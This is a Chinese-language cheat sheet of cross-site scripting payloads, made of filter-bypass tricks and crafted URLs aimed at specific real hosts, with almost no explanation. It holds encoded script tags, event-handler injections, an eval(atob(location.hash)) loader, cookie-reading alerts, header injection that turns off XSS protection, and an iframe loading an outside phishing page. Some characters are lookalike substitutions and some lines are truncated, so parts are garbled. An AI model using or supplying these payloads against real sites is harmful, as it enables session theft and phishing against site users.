'“>ipt> 过滤script绕过
<img src=""οnerrοr=“alert(‘xss’)”> 直接k掉script绕过

包含alert就绕过（括号一串数字是alert(xss)的ASCII值）

通过构造一个带xss的锚点绕过

过chrome默认xss过滤器

http://54.222.168.105:8065/?error=email%E9%94%99%E8%AF%AF%3C/script%3E%3Cscript%3E1%3C(br=1)*/%0deval(atob(location.hash.substr(1)))%3C/script%3E#xxxxxx

%22Onclick%3D(outerHTML%3DURL)|%26quot#<img/src=# οnerrοr=alert()>
%27%29%0D%0Aalert%28document.cookie%29%2F%2F

(最常用）

<img scr=javascript:alert(“跨站”)>

http://www.example.com/MyApp.aspx?myvar= "></XSS/-/STYLE=xss:e/**/xpression(alert(‘XSS’))>

" οnclick="alert(1)"

“]}%3Cscript%3Ealert(‘By b14ckb0y’)%3C/script%3E{[&item=”]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600>["

/peixun/Search.asp?Field=&Keyword=&ClassID=0&page=2
/peixun/Search.asp?Field='/>&Keyword=&ClassID=0&page=2

Referer: '"> 传送头插入

/peixun/Search.asp?Field=%27%22%3E%3Ciframe+id%3D445+src%3Dhttp%3A%2F%2Fdemo.testfire.net%2Fphishing.html%3E

/peixun/Search.asp?Field='">

/user/User_Message.asp?Action=Manage&ManageType=Inbox&Field=Content%22%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%35%38%34%38%33%29%3c%2f%73%43%72%49%70%54%3e

< name=“Submit”>

http://www.xx.com/netsearch_pre.jsp?netname=1" οnmοuseenter="prompt(/csits/)

url=%0aX-XSS-Protection:%200%0a%0d%0a%0d<img%20src=1%20οnerrοr=alert(/xss/)>

http://edu.gf.com.cn/simulate?type=simulate_open&category=%3Cimg%20src=@%20οnmοuseοver=confirm(/xssme27/)%3E